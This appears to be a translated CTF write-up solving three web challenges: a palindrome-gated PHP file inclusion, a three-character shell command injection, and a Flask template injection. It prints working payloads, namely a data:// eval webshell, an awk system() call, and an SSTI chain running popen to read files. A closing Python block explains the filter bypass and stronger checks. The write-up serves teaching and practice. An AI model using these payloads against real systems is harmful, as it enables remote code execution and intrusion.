web签到 (Web warm-up)
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];
if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }
}
A file inclusion challenge with one extra check, a string-reversal function (the input has to be a palindrome). The data:// wrapper handles it:
data://text/plain,<?php @eval($_GET[1]);?>>?;)]1[TEG_$(lave@ php?<,nialp/txet//:atad
easyPHP
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$cmd = $_POST['cmd'];
$param = $_POST['param'];
if(isset($cmd) && isset($param)){
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}
A simple RCE: cmd is cut to three characters, so it has to be a three-letter command, and awk is used here.
Basic form: awk 'condition {action}' filename
payload: awk 'BEGIN{system("ls");}' __FILE__
POST
cmd=awk&param=BEGIN{system("ls>a")}
姻缘测试 (Love match test)
User input controls the page content, so a blind guess: SSTI!
The page source reveals a /source route:
def is_hacker(string):
    """What use are all those fancy WAFs? This one alone stamps out SSTI outright."""
    if "{" in string and "}" in string :
        return True
    else:
        return False
Hard to tell what it achieves (each parameter is checked on its own, and a value is flagged only when it contains both braces), so let's fuzz it ourselves.
Splitting the braces across the two parameters works: result?boy_name={{'&girl_name='}}
So fire away.
payload:?boy_name={{%27&girl_name=%27.__class__.__base__.__subclasses__()[132].__init__.__globals__.popen('cat /f*').read()}}
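As an added example (not code from the challenge or the writeup), the following Python shows why the per-parameter brace check above misses `{{` and `}}` split across boy_name and girl_name, and two stricter checks a defender could use. PAGE_TEMPLATE is an assumed stand-in for how the challenge splices the two names into its page.

```python
# Added example, not from the challenge or the writeup.
# Shows why a per-parameter "{" and "}" check misses template braces split
# across two fields, and two stricter checks. PAGE_TEMPLATE is a constructed
# stand-in for how the challenge splices the two names into its page.

PAGE_TEMPLATE = "Match result: {boy_name} + {girl_name}"
TEMPLATE_MARKERS = ("{{", "}}", "{%", "%}", "{#", "#}")


def is_hacker(string):
    """The challenge's original check: a value is flagged only when it
    contains BOTH an opening and a closing brace."""
    return "{" in string and "}" in string


def is_hacker_per_param(params):
    """How the challenge applies it: every parameter is checked on its own."""
    return any(is_hacker(v) for v in params.values())


def is_hacker_assembled(params, page_template=PAGE_TEMPLATE):
    """Inspect the text the server is about to render, not the fields.
    str.format() does not re-interpret braces in substituted values, so the
    result is exactly the string a render_template_string call would see."""
    assembled = page_template.format(**params)
    return any(marker in assembled for marker in TEMPLATE_MARKERS)


def is_hacker_strict(params):
    """Simplest robust filter: reject a lone brace of either kind in any
    field. (Better still is not building templates from user input at all
    and passing the names in as template context.)"""
    return any("{" in v or "}" in v for v in params.values())


# Constructed inputs: a benign pair and the split-brace trick from the
# writeup, using a harmless arithmetic probe instead of the real payload.
BENIGN = {"boy_name": "Tom", "girl_name": "Amy"}
SPLIT = {"boy_name": "{{7*", "girl_name": "7}}"}

if __name__ == "__main__":
    print(is_hacker_per_param(SPLIT))  # False: each field holds one brace kind
    print(is_hacker_assembled(SPLIT))  # True: "{{" appears once assembled
    print(is_hacker_strict(SPLIT))     # True: a lone brace is enough
```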